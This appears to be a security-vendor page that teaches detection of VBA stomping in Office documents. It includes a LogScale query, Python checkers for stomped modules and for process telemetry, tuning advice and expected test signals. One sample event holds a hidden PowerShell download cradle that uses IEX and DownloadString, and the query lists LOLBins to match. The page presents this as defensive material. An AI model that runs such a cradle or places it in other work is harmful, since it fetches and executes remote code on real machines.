Detect VBA Stomping in CrowdStrike LogScale
Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded in Microsoft Office documents by replacing the compressed VBA source code in the module stream with null bytes, benign code, or random data while leaving the previously compiled malicious p-code intact in the PerformanceCache. Office only trusts that cached p-code when the Office version recorded in the _VBA_PROJECT stream matches the version opening the document; in that case the malicious p-code executes directly, bypassing static scanners that examine only the decompressed source stream and may report no macros present. When the versions do not match, Office discards the cached p-code and recompiles the module from the (stomped) source, so the payload never runs: a stomped document is built for one specific Office build and is inert on others. Tools such as Evil Clippy automate the stomping process. Because the technique defeats source-code-level analysis, detection relies primarily on behavioral indicators: Office applications spawning unexpected child processes, making suspicious outbound network connections, and writing unusual files to disk. These are the same runtime behaviors as conventional macro malware, but they are invisible to many automated pre-execution scanning tools. Static confirmation is still possible by disassembling the p-code (pcodedmp) and comparing it with the decompressed source (olevba), since a module whose p-code references procedures or string literals that the source does not contain has been stomped.
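The following is an added example, not code from the original page, Evil Clippy, oletools or pcodedmp. It implements a minimal static check for a stomped module directly on the MS-OVBA byte layouts the paragraph describes: a module stream holds the compiled p-code first and the compressed source at MODULEOFFSET, and the _VBA_PROJECT stream opens with 0x61CC followed by the Office version the p-code was built for. The sample streams are constructed inline; the "p-code" bytes are placeholders carrying an inline string literal where a real LitStr operand would sit, and the version value is a placeholder, not a real Office build number. With a real document you would read the streams with olefile and take MODULEOFFSET from the decompressed dir stream.

```python
import math
import re
import struct

PRINTABLE = re.compile(rb"[\x20-\x7e]{6,}")
PROCEDURE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+\w+", re.I | re.M)


def decompress(container: bytes) -> bytes:
    """MS-OVBA 2.4.1 decompression: raw chunks, literal tokens and copy tokens."""
    if not container or container[0] != 0x01:
        raise ValueError("missing CompressedContainer signature byte 0x01")
    out = bytearray()
    pos = 1
    while pos + 2 <= len(container):
        header = struct.unpack_from("<H", container, pos)[0]
        chunk_end = pos + (header & 0x0FFF) + 3      # CompressedChunkSize, header included
        pos += 2
        chunk_start = len(out)
        if not header >> 15:                          # CompressedFlag clear: 4096 raw bytes
            out += container[pos:pos + 4096]
            pos += 4096
            continue
        while pos < chunk_end:
            flags = container[pos]                    # one bit per following token
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:            # literal token: copy one byte
                    out.append(container[pos])
                    pos += 1
                    continue
                token = struct.unpack_from("<H", container, pos)[0]   # copy token
                pos += 2
                current = len(out) - chunk_start      # bytes decoded so far in this chunk
                bit_count = max(math.ceil(math.log2(max(current, 1))), 4)
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                src = len(out) - offset
                for i in range(length):               # byte-wise so overlapping copies work
                    out.append(out[src + i])
    return bytes(out)


def compress_literal(plain: bytes) -> bytes:
    """Valid CompressedContainer using literal tokens only (used to build samples)."""
    container = bytearray([0x01])
    for start in range(0, len(plain), 2048):          # keeps every chunk under the 4098-byte limit
        body = bytearray()
        for i in range(start, min(start + 2048, len(plain)), 8):
            body.append(0x00)                         # flag byte: next 8 tokens are literals
            body += plain[i:i + 8]
        container += struct.pack("<H", 0xB000 | (len(body) - 1)) + body   # flag=1, sig=0b011
    return bytes(container)


def vba_project_version(stream: bytes) -> int:
    """Office version recorded in _VBA_PROJECT; the p-code runs only when it matches."""
    reserved, version = struct.unpack_from("<HH", stream, 0)
    if reserved != 0x61CC:
        raise ValueError("not a _VBA_PROJECT stream")
    return version


def analyse_module(module_stream: bytes, module_offset: int) -> dict:
    """Flag a module whose p-code cannot be explained by its source."""
    pcode = module_stream[:module_offset]
    try:
        source = decompress(module_stream[module_offset:]).decode("latin-1")
    except (ValueError, IndexError, struct.error):
        source = None                                 # nulled or garbage source region
    pcode_strings = {s.decode() for s in PRINTABLE.findall(pcode)}
    orphans = sorted(s for s in pcode_strings if source is None or s not in source)
    has_procedures = bool(source) and PROCEDURE.search(source) is not None
    return {
        "source": source,
        "orphan_strings": orphans,                    # literals in p-code but not in source
        "stomped": any(pcode) and (not has_procedures or bool(orphans)),
    }


# Constructed samples (placeholder p-code and a placeholder Office version, not real data).
PCODE = b"\x27\x00\x11\x00" + b"cmd.exe /c whoami" + b"\x00\x0f\x00"
SOURCE_REAL = b'Sub AutoOpen()\r\n    Shell "cmd.exe /c whoami"\r\nEnd Sub\r\n'
SOURCE_DECOY = b"Sub AutoOpen()\r\nEnd Sub\r\n"
VBA_PROJECT = struct.pack("<HHBH", 0x61CC, 0x0800, 0x00, 0x0000)   # Reserved1, Version, Reserved2/3

if __name__ == "__main__":
    print("p-code compiled for Office version 0x%04x" % vba_project_version(VBA_PROJECT))
    for label, source in (("honest", SOURCE_REAL), ("decoy", SOURCE_DECOY)):
        print(label, analyse_module(PCODE + compress_literal(source), len(PCODE))["stomped"])
    print("nulled", analyse_module(PCODE + b"\x00" * 40, len(PCODE))["stomped"])
```

The honest maldoc (source and p-code agree) is not reported as stomped, which is the point: source-level scanners handle that case. The decoy-source and nulled-source variants are, because the p-code carries a literal the source cannot account for, or because there is no decodable source at all. The string-literal comparison is a heuristic; pcodedmp's full disassembly is the reliable way to compare procedures.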
MITRE ATT&CK
- Tactic: Defense Evasion
- Technique: T1564 Hide Artifacts
- Sub-technique: T1564.007 VBA Stomping
- Canonical reference: https://attack.mitre.org/techniques/T1564/007/
LogScale Detection Query
```
#event_simpleName=ProcessRollup2
| ParentBaseFileName=/^(winword|excel|powerpnt|msaccess|mspub|outlook|onenote)\.exe$/i
| ImageFileName=/\\(cmd|powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32|bitsadmin|certutil|wmic)\.exe$/i
| case {
    ImageFileName=/\\(powershell|pwsh|mshta|wscript)\.exe$/i | risk := "critical";
    ImageFileName=/\\(cmd|bitsadmin|certutil|regsvr32)\.exe$/i | risk := "high";
    * | risk := "medium"
  }
| table([timestamp, ComputerName, UserName, ParentBaseFileName, ImageFileName, CommandLine, risk], sortby=timestamp, order=desc)
```
Detects Office applications spawning suspicious child processes via CrowdStrike Falcon telemetry. The parent regex is anchored to the whole base file name and the child regex requires a path separator before the binary name, so names that merely contain "excel" or "cmd" do not match. The risk tiers are assigned with LogScale's `case` block (the query language has no `eval`); the script and HTML hosts that can run an arbitrary payload in one step are rated critical, the remaining LOLBins high, and everything else medium.
Data Sources
- CrowdStrike Falcon endpoint process telemetry ingested into LogScale
Required Tables
- ProcessRollup2 events (#event_simpleName=ProcessRollup2) with the ParentBaseFileName, ImageFileName, CommandLine, ComputerName and UserName fields used by the query
False Positives & Tuning
- Finance and accounting teams using Excel macros that invoke cmd.exe or PowerShell for data export pipelines, FTP uploads, or ERP system automation
- IT-managed Excel workbooks that launch PowerShell for SCCM inventory collection, compliance reporting, or system configuration checks
- Developer workstations where Office VBA macros automate build, test, or deployment tasks by spawning scripts
- Helpdesk support tooling that uses Word or Excel macros to launch remote assistance utilities or system diagnostic scripts
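The following is an added example, not code from the original page or from CrowdStrike. It runs the LogScale query's filter and risk tiers in Python over constructed ProcessRollup2-style events so the parent/child logic can be checked offline, and adds an allowlist hook of the kind the tuning list above calls for. Field names mirror the Falcon fields the query uses; the events, host names, users, command lines and the allowlist entry are all made up for illustration.

```python
import re

OFFICE_PARENT = re.compile(
    r"^(winword|excel|powerpnt|msaccess|mspub|outlook|onenote)\.exe$", re.I)
SUSPICIOUS_CHILD = re.compile(
    r"\\(cmd|powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32|bitsadmin|certutil|wmic)\.exe$", re.I)
CRITICAL_CHILD = re.compile(r"\\(powershell|pwsh|mshta|wscript)\.exe$", re.I)
HIGH_CHILD = re.compile(r"\\(cmd|bitsadmin|certutil|regsvr32)\.exe$", re.I)

# Tuning hook for the false positives listed above. Each entry is a hypothetical
# approved Office automation, matched on host name AND command line so that a
# blanket "Excel may spawn PowerShell" exception is never created.
ALLOWLIST = [
    (re.compile(r"^FIN-", re.I), re.compile(r"\\erp-export\.ps1", re.I)),
]


def risk_for(image: str) -> str:
    """Same tiers as the query's case block."""
    if CRITICAL_CHILD.search(image):
        return "critical"
    if HIGH_CHILD.search(image):
        return "high"
    return "medium"


def is_allowlisted(event: dict) -> bool:
    return any(host.search(event.get("ComputerName", "")) and cmd.search(event.get("CommandLine", ""))
               for host, cmd in ALLOWLIST)


def detect(events):
    """Return the alerts the query would produce, newest first."""
    hits = []
    for ev in events:
        if ev.get("event_simpleName") != "ProcessRollup2":
            continue
        if not OFFICE_PARENT.match(ev.get("ParentBaseFileName", "")):
            continue
        image = ev.get("ImageFileName", "")
        if not SUSPICIOUS_CHILD.search(image):
            continue
        if is_allowlisted(ev):
            continue
        hits.append({**ev, "risk": risk_for(image)})
    return sorted(hits, key=lambda h: h["timestamp"], reverse=True)


# Constructed sample telemetry (not real Falcon data).
SAMPLE_EVENTS = [
    {"event_simpleName": "ProcessRollup2", "timestamp": 1700000001, "ComputerName": "WS-0142",
     "UserName": "jdoe", "ParentBaseFileName": "WINWORD.EXE",
     "ImageFileName": r"\Device\HarddiskVolume3\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"event_simpleName": "ProcessRollup2", "timestamp": 1700000005, "ComputerName": "WS-0142",
     "UserName": "jdoe", "ParentBaseFileName": "EXCEL.EXE",
     "ImageFileName": r"\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -c IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8080/a')"},
    {"event_simpleName": "ProcessRollup2", "timestamp": 1700000003, "ComputerName": "WS-0077",
     "UserName": "asmith", "ParentBaseFileName": "POWERPNT.EXE",
     "ImageFileName": r"\Device\HarddiskVolume3\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"event_simpleName": "ProcessRollup2", "timestamp": 1700000004, "ComputerName": "FIN-0007",
     "UserName": "svc_erp", "ParentBaseFileName": "EXCEL.EXE",
     "ImageFileName": r"\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File \\fs01\scripts\erp-export.ps1"},
    {"event_simpleName": "ProcessRollup2", "timestamp": 1700000006, "ComputerName": "WS-0142",
     "UserName": "jdoe", "ParentBaseFileName": "explorer.exe",
     "ImageFileName": r"\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"event_simpleName": "ProcessRollup2", "timestamp": 1700000007, "ComputerName": "WS-0142",
     "UserName": "jdoe", "ParentBaseFileName": "WINWORD.EXE",
     "ImageFileName": r"\Device\HarddiskVolume3\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit["timestamp"], hit["risk"], hit["ParentBaseFileName"], "->", hit["CommandLine"])
```

Of the six events, three alert: the hidden PowerShell download cradle from Excel (critical), rundll32 from PowerPoint (medium) and cmd.exe from Word (high), in that order once sorted newest first. The finance host's ERP export is suppressed by the allowlist, and the PowerShell started from explorer.exe and the notepad.exe child never match. Encode exceptions in LogScale the same way, as a host-and-command-line pair negated with `!` in the filter, rather than dropping whole binaries from the child list.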
Testing Methodology
Validate this detection against the four Atomic Red Team tests for T1564.007 below. Each test lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: VBA Stomping with Evil Clippy
Expected signal: Sysmon Event ID 1: powershell.exe spawned, then EvilClippy.exe spawned. Sysmon Event ID 11: file creation for df00tech_test.docm and df00tech_test_patched.docm. Sysmon Event ID 1: WINWORD.EXE started out of process (parent svchost.exe hosting DcomLaunch, not powershell.exe) when PowerShell instantiates the Word.Application COM object to build the document. No detection alert is expected at the stomping stage; this test only validates that the document is created, and the execution detection fires in Test 2.
- Test 2: Open Stomped Document and Verify Child Process Spawning
Expected signal: Sysmon Event ID 1: WINWORD.EXE process created, then cmd.exe spawned as a child with ParentImage=WINWORD.EXE and CommandLine containing 'echo df00tech_vba_execution_test'. Sysmon Event ID 11: file creation for df00tech_exec_marker.txt. Security Event ID 4688 (if process command line auditing is enabled): cmd.exe with parent WINWORD.EXE. In Falcon telemetry this is the ProcessRollup2 event the LogScale query matches, rated "high".
- Test 3: Verify VBA Stomping with pcodedmp and oletools
Expected signal: Sysmon Event ID 1: pip.exe and python.exe process creations. No child process spawning from Office during this test (analysis only). olevba output shows the 'AutoOpen' macro source code and pcodedmp output shows the compiled p-code, confirming both are present in the pre-stomped document. Re-running pcodedmp on the stomped output of Test 1 shows the same p-code while the decompressed source is empty or benign, confirming the stomp succeeded.
- Test 4: Office Macro Spawning PowerShell Download Cradle
Expected signal: Sysmon Event ID 1: EXCEL.EXE spawns powershell.exe with ParentImage=EXCEL.EXE. CommandLine contains '-WindowStyle Hidden', '-ExecutionPolicy Bypass', 'Net.WebClient', 'DownloadString' and 'IEX'. Sysmon Event ID 3: powershell.exe attempts an outbound connection to 127.0.0.1:8080 (the connection fails because nothing is listening). PowerShell Script Block Logging Event ID 4104 captures the download cradle. Security Event ID 4688 with process command line auditing. The LogScale query rates this child process "critical".
References
- https://attack.mitre.org/techniques/T1564/007/
- https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html
- https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/
- https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278
- https://github.com/bontchev/pcodedmp
- https://github.com/decalage2/oletools
- https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239
- https://github.com/outflanknl/EvilClippy
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.007/T1564.007.md
- https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference